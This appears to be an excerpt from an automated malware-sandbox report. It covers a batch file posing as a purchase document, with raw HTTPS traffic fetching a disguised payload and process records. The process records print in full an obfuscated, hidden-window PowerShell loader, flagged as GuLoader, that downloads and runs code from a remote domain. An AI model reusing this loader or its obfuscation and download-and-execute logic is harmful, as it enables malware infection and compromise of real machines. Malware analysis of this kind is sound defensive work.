                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 6e 73 63 33 36 53 34 31 77 77 51 44 42 72 6e 44 77 4b 45 43 58 67 61 69 6f 38 4d 68 79 62 68 47 78 55 56 54 32 64 37 4f 55 32 35 43 45 6f 65 39 55 71 37 52 52 71 46 6e 48 75 77 52 4a 7a 37 4d 61 36 36 69 55 73 67 65 79 62 78 49 37 57 31 63 33 55 2b 43 50 54 4d 30 53 4d 49 64 51 75 77 66 30 46 61 4a 58 76 72 70 32 30 74 62 48 4c 71 31 68 56 4d 78 78 68 65 2f 6d 75 6e 2b 45 50 6f 54 4c 6b 4e 75 36 35 6a 53 4d 66 38 65 7a 34 59 66 6a 31 50 74 72 56 38 6b 4d 50 65 51 69 69 6a 73 31 77 57 67 66 54 4d 31 65 46 31 59 72 6c 61 42 72 72 46 6a 36 68 7a 6a 71 44 30 7a 47 6f 76 4d 34 73 4c 51 34 68 76 74 7a 33 49 47 44 71 65 6f 66 57 4a 66 37 76 39 44 70 79 7a 4c 4a 50 45 73 61 70 4e 66 4d 68 58 42 51 5a 37 6f 72 6c 30 6f 39 78 2b 6c 72 64 49 78 57 53 68 55 45 43 4b
                                                            Data Ascii: nsc36S41wwQDBrnDwKECXgaio8MhybhGxUVT2d7OU25CEoe9Uq7RRqFnHuwRJz7Ma66iUsgeybxI7W1c3U+CPTM0SMIdQuwf0FaJXvrp20tbHLq1hVMxxhe/mun+EPoTLkNu65jSMf8ez4Yfj1PtrV8kMPeQiijs1wWgfTM1eF1YrlaBrrFj6hzjqD0zGovM4sLQ4hvtz3IGDqeofWJf7v9DpyzLJPEsapNfMhXBQZ7orl0o9x+lrdIxWShUECK
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 33 43 30 67 43 41 47 6c 30 6c 63 45 71 77 6e 6d 4d 2f 6d 6f 41 74 2b 36 4a 34 69 6f 73 34 48 50 38 67 54 44 65 4d 58 2b 66 4a 69 49 52 59 66 32 41 36 44 6e 59 5a 7a 4b 2b 45 67 6c 41 6b 68 68 42 68 4c 58 49 4e 67 45 6b 35 76 34 6b 43 65 47 69 6e 2f 53 36 2f 61 51 41 4a 56 53 36 42 37 41 77 58 55 4b 65 69 32 67 75 47 47 4f 70 44 72 36 75 47 7a 74 6d 6e 74 32 43 41 55 43 56 41 47 75 79 79 4e 33 61 4a 6b 46 41 57 43 71 34 5a 76 77 79 41 69 6d 38 30 69 68 78 61 61 50 48 4f 56 6d 70 35 7a 7a 35 5a 48 65 43 53 6c 50 37 31 7a 33 46 53 63 35 4b 4a 56 51 63 4c 35 78 2f 31 7a 35 62 4b 41 48 4e 65 4f 50 33 59 43 61 72 70 57 49 31 2b 44 44 61 73 55 52 55 63 72 48 67 75 6c 76 54 7a 79 33 34 49 70 48 53 2f 39 34 6c 55 63 67 69 72 2b 64 39 43 6f 48 52 68 56 69 43 62 5a
                                                            Data Ascii: 3C0gCAGl0lcEqwnmM/moAt+6J4ios4HP8gTDeMX+fJiIRYf2A6DnYZzK+EglAkhhBhLXINgEk5v4kCeGin/S6/aQAJVS6B7AwXUKei2guGGOpDr6uGztmnt2CAUCVAGuyyN3aJkFAWCq4ZvwyAim80ihxaaPHOVmp5zz5ZHeCSlP71z3FSc5KJVQcL5x/1z5bKAHNeOP3YCarpWI1+DDasURUcrHgulvTzy34IpHS/94lUcgir+d9CoHRhViCbZ
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 38 51 6a 68 44 37 6a 58 35 72 57 79 79 43 57 54 6b 79 43 57 65 35 6c 64 56 76 4c 2f 36 55 6a 50 74 71 53 57 65 56 79 48 58 64 72 2f 69 48 72 6a 32 57 2f 54 6f 74 2b 69 6c 5a 4b 4e 75 49 61 39 46 41 61 32 34 54 6a 30 6c 52 4f 43 33 74 56 69 4a 78 7a 41 31 34 74 6e 4c 6d 2b 48 56 58 72 39 70 6e 70 79 31 5a 6a 42 52 4c 73 47 39 36 48 55 2b 43 45 77 6b 63 51 79 6b 4a 49 62 62 67 32 53 4f 4a 57 73 67 69 75 2b 4a 76 4e 2f 6d 45 31 6b 4a 68 44 75 6b 4f 2f 4d 2f 52 76 35 62 4f 50 33 64 43 61 66 70 75 39 66 64 65 61 77 79 37 4a 72 48 34 74 30 41 76 42 4c 6e 44 55 35 75 2f 4b 70 59 46 6f 6a 32 6f 72 4c 37 7a 59 64 52 75 65 42 37 76 5a 73 71 79 63 2b 44 63 51 42 72 2f 2f 44 2f 55 47 69 4a 66 6a 54 48 6b 68 46 35 55 2f 33 35 69 55 75 5a 7a 61 32 6a 39 66 6e 6c 52 39
                                                            Data Ascii: 8QjhD7jX5rWyyCWTkyCWe5ldVvL/6UjPtqSWeVyHXdr/iHrj2W/Tot+ilZKNuIa9FAa24Tj0lROC3tViJxzA14tnLm+HVXr9pnpy1ZjBRLsG96HU+CEwkcQykJIbbg2SOJWsgiu+JvN/mE1kJhDukO/M/Rv5bOP3dCafpu9fdeawy7JrH4t0AvBLnDU5u/KpYFoj2orL7zYdRueB7vZsqyc+DcQBr//D/UGiJfjTHkhF5U/35iUuZza2j9fnlR9
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 46 59 4b 50 31 48 6f 4f 4a 65 35 36 75 67 30 5a 57 4c 70 68 72 71 59 6b 50 6d 62 63 46 2b 47 39 4f 6a 48 50 6d 6f 64 4b 31 2b 36 70 65 4e 6a 39 39 62 53 6c 79 53 64 6b 47 47 35 66 73 47 6f 50 58 72 54 30 48 61 64 69 53 56 76 42 66 67 6d 6b 64 4e 5a 63 35 33 41 2b 57 52 32 54 42 51 68 2b 39 64 66 7a 78 67 44 31 69 56 58 55 41 5a 6d 76 39 63 39 63 49 49 7a 45 69 55 33 7a 39 65 6c 62 2f 54 2f 50 6c 7a 71 31 4b 2b 33 74 75 44 44 39 65 49 43 7a 41 62 71 31 66 34 35 32 41 6d 52 6c 70 70 71 76 77 77 54 7a 62 73 78 67 2f 69 5a 46 4c 57 69 32 39 32 70 6b 69 43 57 43 75 75 36 66 69 37 2f 2b 50 39 62 32 45 69 57 61 5a 39 78 69 46 37 2f 2b 56 2f 44 63 43 66 54 6f 74 2b 69 74 52 4b 4d 78 63 67 6f 33 67 37 55 48 65 53 4b 49 72 7a 2f 4b 58 69 4f 66 43 77 44 75 62 6c 57
                                                            Data Ascii: FYKP1HoOJe56ug0ZWLphrqYkPmbcF+G9OjHPmodK1+6peNj99bSlySdkGG5fsGoPXrT0HadiSVvBfgmkdNZc53A+WR2TBQh+9dfzxgD1iVXUAZmv9c9cIIzEiU3z9elb/T/Plzq1K+3tuDD9eICzAbq1f452AmRlppqvwwTzbsxg/iZFLWi292pkiCWCuu6fi7/+P9b2EiWaZ9xiF7/+V/DcCfTot+itRKMxcgo3g7UHeSKIrz/KXiOfCwDublW
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 5a 47 77 37 56 59 46 51 54 64 32 4a 4b 39 76 6c 43 32 56 4e 77 6b 35 54 65 52 31 70 68 36 56 61 61 47 4d 6a 41 6d 35 2f 56 67 78 64 79 31 59 69 56 73 45 45 46 43 72 64 51 77 6c 35 36 67 4e 34 52 4b 41 63 6e 71 4d 78 4f 6a 39 68 68 75 35 55 51 52 35 58 2f 2b 52 6c 4d 37 4c 43 46 37 76 34 72 47 37 68 69 56 46 79 4f 46 49 57 6f 75 4c 53 4b 56 30 50 75 43 54 53 7a 6f 49 77 6e 76 35 4f 50 77 2f 48 46 50 6c 52 39 48 67 6d 66 77 48 5a 52 64 49 54 2b 59 57 76 72 4a 69 75 6b 76 6e 7a 55 4f 4f 65 55 4c 62 4d 6f 62 48 78 79 4b 59 64 53 36 4e 34 57 63 54 6c 75 4e 52 33 7a 65 31 54 36 6a 39 75 33 69 6c 64 44 36 44 34 54 42 6f 74 6d 44 5a 45 6b 49 6c 67 73 63 68 6a 48 36 2f 2f 75 39 54 49 39 4d 6c 6d 73 4b 30 32 73 4f 2f 2f 74 75 4f 70 4f 73 74 61 6a 43 71 34 77 79 76
                                                            Data Ascii: ZGw7VYFQTd2JK9vlC2VNwk5TeR1ph6VaaGMjAm5/Vgxdy1YiVsEEFCrdQwl56gN4RKAcnqMxOj9hhu5UQR5X/+RlM7LCF7v4rG7hiVFyOFIWouLSKV0PuCTSzoIwnv5OPw/HFPlR9HgmfwHZRdIT+YWvrJiukvnzUOOeULbMobHxyKYdS6N4WcTluNR3ze1T6j9u3ildD6D4TBotmDZEkIlgschjH6//u9TI9MlmsK02sO//tuOpOstajCq4wyv
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 6c 59 4f 50 33 65 43 61 7a 70 57 49 31 32 44 53 55 71 62 54 4c 38 38 33 76 7a 6c 30 6c 75 30 43 65 2f 53 61 68 65 67 64 39 2f 4a 6d 52 77 32 77 4d 4a 2b 4e 6d 49 6e 58 51 69 63 71 2f 62 2b 4a 4e 74 43 51 37 4f 6c 59 6e 78 2f 46 44 43 38 66 35 52 57 77 45 61 59 4b 70 57 58 72 35 6f 2f 2f 63 34 30 64 4f 6f 44 67 72 43 70 58 5a 63 32 31 56 36 49 51 4d 6d 54 33 54 50 4c 4b 33 4a 45 4b 44 41 59 49 7a 7a 69 5a 42 51 42 68 56 6b 6f 37 38 6b 67 48 59 59 58 38 2f 31 45 69 79 51 62 58 66 2b 39 73 35 45 36 69 33 77 76 2f 71 37 4d 73 52 45 4a 62 61 65 46 79 6c 44 74 7a 4c 72 66 6e 56 58 4b 47 31 48 56 77 61 57 2f 4c 43 75 73 7a 76 35 42 6a 7a 4d 71 5a 59 57 6a 71 68 34 63 6b 4a 59 79 44 6b 69 55 73 7a 62 33 6c 30 41 75 4e 53 35 64 41 52 62 31 37 44 43 2f 41 67 6c 5a
                                                            Data Ascii: lYOP3eCazpWI12DSUqbTL883vzl0lu0Ce/Sahegd9/JmRw2wMJ+NmInXQicq/b+JNtCQ7OlYnx/FDC8f5RWwEaYKpWXr5o//c40dOoDgrCpXZc21V6IQMmT3TPLK3JEKDAYIzziZBQBhVko78kgHYYX8/1EiyQbXf+9s5E6i3wv/q7MsREJbaeFylDtzLrfnVXKG1HVwaW/LCuszv5BjzMqZYWjqh4ckJYyDkiUszb3l0AuNS5dARb17DC/AglZ
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 57 74 70 75 4f 35 53 54 70 75 70 54 43 34 48 59 55 47 62 67 4d 62 53 48 43 2f 2f 47 65 53 71 78 4c 31 34 4d 70 38 44 34 49 70 4d 36 66 57 61 35 72 31 6c 4f 6e 63 44 35 61 48 73 77 6a 33 7a 7a 31 7a 46 4a 54 5a 63 6d 4a 56 6e 41 5a 69 43 72 31 2f 42 4b 58 7a 53 42 59 4f 50 33 65 41 62 54 70 57 49 31 58 41 7a 73 72 63 52 59 34 39 59 71 44 2f 4d 31 47 4f 45 6c 51 77 76 48 2b 55 6b 33 42 50 51 69 6b 75 41 30 2f 70 7a 31 58 49 4c 77 4f 4b 35 42 6b 45 6f 53 76 7a 46 76 62 41 74 64 71 33 6e 4e 63 6b 49 4c 79 75 69 76 4b 70 39 34 77 33 4a 78 6f 42 38 79 63 2f 47 4f 6c 39 64 30 49 73 7a 6c 78 75 46 65 74 4f 55 4a 6b 38 65 44 44 34 31 48 54 30 43 58 6d 2f 4c 72 52 5a 32 43 51 77 7a 35 71 65 66 36 54 4f 32 49 45 36 4e 4d 37 6f 37 2b 30 46 57 55 35 64 76 32 6a 41 71
                                                            Data Ascii: WtpuO5STpupTC4HYUGbgMbSHC//GeSqxL14Mp8D4IpM6fWa5r1lOncD5aHswj3zz1zFJTZcmJVnAZiCr1/BKXzSBYOP3eAbTpWI1XAzsrcRY49YqD/M1GOElQwvH+Uk3BPQikuA0/pz1XILwOK5BkEoSvzFvbAtdq3nNckILyuivKp94w3JxoB8yc/GOl9d0IszlxuFetOUJk8eDD41HT0CXm/LrRZ2CQwz5qef6TO2IE6NM7o7+0FWU5dv2jAq


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.4 | 49737 | 104.21.62.20 | 443 | 7328 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-08-28 12:01:49 UTC | 171 | OUT | GET /Jouse1.png HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: avocaldoperu.com
                                                            Cache-Control: no-cache
                                                            2024-08-28 12:01:49 UTC | 680 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:01:49 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 494656
                                                            Connection: close
                                                            Last-Modified: Tue, 27 Aug 2024 22:07:49 GMT
                                                            ETag: "78c40-620b178d83740"
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: REVALIDATED
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7koUFLUf62ZgiS8Gkt6PK1fW9bOqxuxKf0aaQidbmROmHX3yePK1Adgy4mE14jaAASMn6uhf5vboZJf1lxz8PnxlEZOfogHfrMXk5aQZKMnM0LBZPYTlWjjeWvTCmOnFY5J%2B"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba4261a6e39b9c5-EWR
                                                            alt-svc: h3=":443"; ma=86400

                                                            Target ID:0
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
                                                            Imagebase:0x7ff7064b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. 
vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:08:01:10
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
                                                            Imagebase:0x7ff7064b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:08:01:16
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. 
vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
